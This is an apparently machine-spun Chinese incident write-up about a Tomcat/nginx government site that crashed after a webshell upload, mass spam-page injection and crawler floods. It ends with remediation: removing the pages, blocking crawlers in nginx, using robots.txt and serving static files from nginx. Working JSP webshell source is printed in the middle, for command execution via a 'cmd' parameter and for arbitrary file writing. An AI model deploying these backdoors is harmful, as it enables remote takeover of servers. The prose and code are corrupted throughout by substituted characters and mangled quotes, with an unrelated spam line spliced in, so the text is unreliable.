通过客户给出的这个提示,问题判断方向有如下几个方面:

1、网站无法访问了,可能做事down了。
也可能做事器宕机了。

2、网站访问很慢,基本打不开,以是客户就认为宕机了,但是此时做事和做事器可能还处于启动状态。

网上下载的jsp网站怎么运行不了网站被植入webshel​​l导致网站瘫痪收集平安防备太主要了 HTML

3、客户自身网络问题,或者DNS问题?

带着疑问,开始了故障排查。

二、问题排查

作为一个运维老鸟,我的一向思路便是眼见为实,既然客户说网站不能访问了,那我还须要自己测试一下,打开浏览器,输入域名,网站久久不能打开,直到超时。
看来确实网站打不开了。

2.1、初步排查

接着,开始登录做事器把脉,客户网站的架构是nginx+tomcat,我首先通过ssh登录到nginx做事器上,连接速率还是很快的,登录上去后,先实行下top命令,检讨下系统整体运行状态,如下图所示:

这是一个centos6.9的系统,nginx做事器的硬件配置是32Gb内存,2颗8核物理CPU,nginx通过负载均衡将动态、静态要求发送给后真个多个tomcat上,tomcat运行在其余两台独立的做事器上,硬件配置为2颗8核物理CPU,64GB内存(这配置太给力了,客户不缺钱)。

从图中可以看出,做事器CPU资源有一定负载,但是不高,32GB的内存资源还比较充足,cached了不少内存,这部分都是可以利用的。
其余16个nginx进程每个均匀占用CPU负载在30%-40%之间。
整体来看,系统资源还是比较充足的,初步判断,不是nginx做事器的问题。

接着,连续登录到tomcat所在的做事器,仍旧通过top命令查看系统整体资源状态,如下图所示:

tomcat做事器也是一个centox6.9的系统,系统整体负载偏高(最高14),64Gb的物理内存,可用的仅剩下200M旁边,虽然cached了48GB旁边,其余可以看到有三个java进程,每个进程占用cpu资源都在100%以上,并且一贯持续了几个小时,这里有些非常,末了,关注了一下,启动java进程的是apsds这个普通用户。

然后连续查看,创造这三个java进程,实在是启动了三个tomcat实例,每个tomcat实例都是一个独立的做事,接着,再去查看第二个tomcat物理做事器,创造跟现在这个无论是硬件配置、还是软件支配环境,都完备同等,也便是两台tomcat启动了6个tomcat实例,通过前真个nginx做负载均衡整合,对外供应web做事。

2.2、第二次排查

通过大略的一遍做事器状态过滤,创造可能出问题的是tomcat做事器,于是将精力集中在tomcat做事器上,于是,重新登录tomcat机器,查看tomcat访问日志,通过对日志的查看,创造了一些非常,由于有很多不熟习的静态页面被访问,如下图所示:

图中966.html这个页面觉得有问题,由于客户的网站静态页面是自动天生的,天生的页面后缀是.htm的,而不是html,这是其一,其二,通过查看966.html这个页面的访问次数,吓了一大跳,一天的韶光,300多万次访问,这明显不正常,由于客户网站平时的访问量都在10万以内,根本不可能这么高。

接着,连续查看访问日志,创造类似966.html的这种页面访问非常多,每个页面的访问量都很大,于是,就到/htm/966.html对应的网站目录下,一探究竟吧,进入网站根目录下的htm目录,又创造了一些非常,如下图所示:

这个目录是网站天生的静态页面孔录,可以看到有基于htm的静态页面,这些页面以gk开头,是客户网站自动天生的正常文件,其余还有很多以html结尾的静态文件,这些文件不清楚是怎么来的,此外,还看到有个1.jsp的文件,这个就更诡异了,在静态页面孔录下,不可能放一个jsp文件啊,经由与客户的咨询以及与研发的沟通,确认这些以html结尾的静态文件以及1.jsp文件都不是网站本身天生或利用的,那么重点来了,先来看看这些文件的内容吧。

首先查看以html结尾的静态文件内容是什么吧,这里就以这个996.html文件为例,通过浏览器访问996.html文件,顿时,傻眼了!


请看下图:

百度,中奖查询!


,此时脑筋的第一反应是,网站被植入WebShell了,看来问题非常严重。

接着,连续打开1.jsp这个文件,看看这个文件到底是什么鬼,此文件内容如下:(代码仅供学习,请勿其它用场)

<%@page import=\"大众java.io.IOException\公众%><%@page import=\公众java.io.InputStreamReader\"大众%><%@page import=\"大众java.io.BufferedReader\"大众%><%@ page language=\公众java\公众 import=\公众java.util.\"大众 pageEncoding=\"大众UTF-8\"大众%><% String cmd = request.getParameter(\"大众cmd\"大众); System.out.println(cmd); Process process = null; List<String> processList = new ArrayList<String>(); try { if (cmd!=null) { process = Runtime.getRuntime().exec(cmd); BufferedReader input = new BufferedReader(new InputStreamReader(process.getInputStream())); String line = \公众\公众; while ((line = input.readLine()) != null) { processList.add(line); } input.close(); } } catch (IOException e) { e.printStackTrace(); } String s = \公众\"大众; for (String line : processList) { s += line + \公众\n\"大众; } if (s.equals(\公众\"大众)) { out.write(\"大众null\"大众); }else { out.write(s); }%>

好嘛,稍懂程序的人都能看出,这是一个WebShell木 马后门,它能干啥,先来试试,就知道了,打开浏览器,访问:http://ip/htm/1.jsp?cmd=ls /,

如下图所示:

这不是我的做事器根目录吗,然后将”cmd=“后面的字符更换成任意linux下可实行的命令,都能正常实行,这便是浏览器下的命令行啊!


再实行一个写操作看看,在浏览器访问如下地址:

[apsds@tomcatserver1 htm]$ pwd/usr/local/tomcat/webapps/ROOT/htm[apsds@tomcatserver1 htm]$ ll test.html -rw-r----- 1 apsds apsds 0 10月 16 10:57 test.html

看到了吧,成功写入。

不过还是比较幸运的,由于tomcat进程是通过普通用户apsds启动的,以是通过这个1.jsp只能在apsds用户权限下进行添加、删除操作,如果tomcat因此root用户启动的话,那问题就更严重了,由于这个1.jsp可以对系统下任意文件或目录进行修正、删除操作了,实在相称于浏览器的root权限操作了。

到这里为止,彷佛问题正在逐渐浮出水面。

但是,我们高兴太早了,上个文件还没完备搞清楚,新的问题又来了,我们在查询客户网站搜索权重的时候,新的问题涌现了,如下图所示:

这是在搜索引擎搜到的客户网站内容,很明显,客户网站被植入了造孽内容,然后被搜索引擎收录了,点开搜索出来的任意一个页面,内容如下:

经由剖析,可以创造,这个页面的部分内容被更换了,更换的内容都是一些网站的关键字,该当是黑帽SEO的手段。

这里说到了搜索引擎,溘然意识到,这次的故障,是否跟搜索引擎有关系呢?

整理了一下思路,觉得该当是这样的:

1、网站该当有程序漏洞,在互联网被扫描到,然后注入了webshell。

2、骇客通过webshell植入了大量广告、推销网页。

3、由于网站(gov网站)权重比较高,以是搜索引擎比较喜好来访

4、大量广告、推销网页被搜索引擎抓取,导致网站访问量激增。

5、客户的网站是nginx+多个tomcat实现的负载均衡,所有动态、静态页面要求都交给tomcat来处理,当涌现大量静态要求时,可能会导致tomcat

无法相应。
由于tomcat处理静态要求性能很差。

2.3、第三次排查

带着上面这个思路,连续进行排查,步骤如下:

1、排查网站上被注入的html页面的数量

通过find查找、过滤,创造被植入的html页面有两类,分别是百度虚假中奖广告页面和黑帽seo关键字植入页面。

两种类型的html页面,统共有20w个旁边,这个数量相称惊人。

2、排查网站访问日志

通过对tomcat访问日志的统计和剖析,创造每天对这些注入页面的访问量超过500w次,并且险些全部是通过搜索引擎过来的流量,做了个大略的过滤统计,结果如下:

[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep Baiduspider|wc -l 596650[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep Googlebot|wc -l 540340[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep 360Spider|wc -l 63040[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep bingbot|wc -l 621670[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep YisouSpider|wc -l 3800100[root@tomcatserver1 logs]# cat access_log.2018-10-16.txt|grep Sogou|wc -l 533810

个中,Baiduspider表示百度蜘蛛、Googlebot表示谷歌蜘蛛、360Spider表示360蜘蛛、bingbot表示必应蜘蛛、YisouSpider表示宜搜蜘蛛、Sogou表示搜狗蜘蛛,个中,YisouSpider过来抓取的量最大,正常来说,蜘蛛抓取不应该这么频繁啊,于是大略搜索了一下YisouSpider这个蜘蛛,如下图所示:

看来是个泼皮蜘蛛,网络上对这个YisouSpider的蜘蛛骂声一片。

3、查看nginx缺点日志

通过查看nginx缺点日志,创造有大量连接返回超时要求(502缺点),也便是说,nginx把要求交给tomcat后,tomcat迟迟不返回,导致返回超时,涌现502 bad gateway缺点。
这个很明显是tomcat无法相应要求导致的。

那么就来看看tomcat做事器上的连接数情形:

[root@tomcatserver1 logs]# netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'TIME_WAIT 125300CLOSE_WAIT 12FIN_WAIT1 197FIN_WAIT2 113ESTABLISHED 13036SYN_RECV 115CLOSING 14LAST_ACK 17

这里实在只须要关注三种状态即可:ESTABLISHED表示正在通信,TIME_WAIT表示主动关闭,正在等待远程套接字的关闭传送,CLOSE_WAIT表示远程被动关闭,正在等待关闭这个套接字。

从输出可知,做事器上保持了大量TIME_WAIT状态和ESTABLISHED状态,大量的TIME_WAIT,该当是tomcat无法相应要求,然后超时,主动关闭了连接,导致涌现TIME_WAIT,各类迹象表明,tomcat无法处理这么大的连接要求,导致相应缓慢,终极做事涌现无相应。

通过这三个方面的排查,基本验证了自己的思路,那么问题也随即找到了。

三、办理问题

网站有漏洞,然后被注入webshell,继而被上传了大量广告、推广网页,导致搜索引擎猖獗抓取,终极导致薄弱的tomcat不堪重负,失落去相应,这是这次故障发生的根本缘故原由。

1、修复网站程序漏洞

要办理这个问题,首选要做的是找到网站漏洞,研发参与后,通过代码排查,创造了网站漏洞的缘故原由,是由于网站后台利用了一个轻量级的远程调用协议json-rpc来与做事器进行数据交流通讯,但是此接口缺少校验机制,导致骇客获取了后台登录的账号和密码,然后在后台上传了一个webshell,进而掌握了操作系统。

研发在第一韶光修复了这个漏洞,然后便是运维的干活韶光了。

我们首先在做事器上进行了网页扫描,紧张扫描html为后缀的文件,然后全部删除(由于我们的网页都因此.htm结尾),同时删除了那个1.jsp文件,并连续查找和检讨其它可疑的jsp文件,检讨过程中又创造了一个jsp后门,基本特色码如下:(代码仅供学习)

<% if(request.getParameter(\公众f\"大众)!=null)(new java.io.FileOutputStream(application.getRealPath(\公众/\"大众)+request.getParameter(\"大众f\"大众))).write(request.getParameter(\公众t\"大众).getBytes()); %>

然后果断删除。
不留后患。

2、禁封网络蜘蛛

网络上的蜘蛛、爬虫很多,有些是正规的,有些是泼皮,适当的网络蜘蛛抓取对网站权重、流量有益,而那些泼皮的蜘蛛必须要禁止,要实现禁封网络蜘蛛,在nginx下可通过如下配置实现:

server { listen 80; server_name 127.0.0.1; #添加如下内容即可防止爬虫if ($http_user_agent ~ \公众qihoobot|YisouSpider|Baiduspider|Googlebot|Googlebot-Mobile|Googlebot-Image|Mediapartners-Google|Adsbot-Google|Feedfetcher-Google|Yahoo! Slurp|Yahoo! Slurp China|YoudaoBot|Sosospider|Sogou spider|Sogou web spider|MSNBot|ia_archiver|Tomato Bot\"大众) { return 403; }

这样,当蜘蛛过来爬取你网站的时候,直接给他返回一个403缺点,这里禁止了很多网络蜘蛛,如果你还须要蜘蛛的话,可保留几个比较正规的,例如谷歌蜘蛛和百度蜘蛛即可,实在一律封掉。

上面这个办法有点大略粗暴,但是最有效,实在还可以在网站更目录下增加Robots.txt文件,在这个文件中我们可以声明该网站中不想被robots访问的部分,或者指定搜索引擎只收录指定的内容。

robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。
robots.txt文件见告蜘蛛程序在做事器上什么文件是可以被查看和抓取的,当一个搜索蜘蛛访问一个站点时,它会首先检讨该站点根目录下是否存在robots.txt,如果存在,搜索蜘蛛就会按照该文件中的内容来确定访问的范围;如果该文件不存在,所有的搜索蜘蛛将能够访问网站上所有没有被口令保护的页面。

Robots协议是国际互联网界通畅的道德规范,请把稳,是道德标准,因此,如果搜索引擎不遵守约定的Robots协议,那么通过在网站下增加robots.txt也是不起浸染的。

目前的网络蜘蛛大致分为4种:

(1)、真名真姓,遵照robots.txt协议。

(2)、真名真姓,不遵照robots.txt协议。

(3)、匿名,不遵照robots.txt协议。

(4)、伪装:不遵照robots.txt协议。

目前看来,绝大多数的搜索引擎机器人都遵守robots.txt规则的。
但是一些不有名的网络蜘蛛就会常常耍泼皮,对待这种蜘蛛,建议利用上面nginx下配置的规则,直接给它deny了。

下面看几个robots.txt配置例子

(1)、许可所有的robot访问

User-agent: Disallow:

(2)、禁止所有搜索引擎访问网站的任何部分

User-agent: Disallow: /

(3)、禁止所有搜索引擎访问网站的几个部分(下例中的a、b、c目录)

User-agent: Disallow: /a/Disallow: /b/Disallow: /c/

(4)、禁止某个搜索引擎的访问(下例中的YisouSpider)

User-agent: YisouSpiderDisallow: /

(5)、只许可某个搜索引擎的访问(下例中的Googlebot)

User-agent: GooglebotDisallow:User-agent: Disallow: /

通过Robots.txt文件方法去现在搜索引擎,是一个防君子不防小人的方法,碰到泼皮蜘蛛就没辙了,有些无耻的搜索引擎根本不看网站的robots.txt,一起狂抓下去,实在另人发指。

3、调度网站的web架构

由于tomcat处理静态资源能力很低,因此,可以将静态资源交给nginx来处理,动态资源交给tomcat处理,通过这种动、静分类办法,可以大大提高网站的抗压性能。

我们采取的办法是将tomcat天生的htm文件放到一个共享磁盘分区,然后在nginx做事器上通过nfs挂载这个磁盘分区,这样nginx就可以直接访问这些静态文件。

通过上面三个步骤的操作,网站在半个小时内负载低落,很快规复正常了。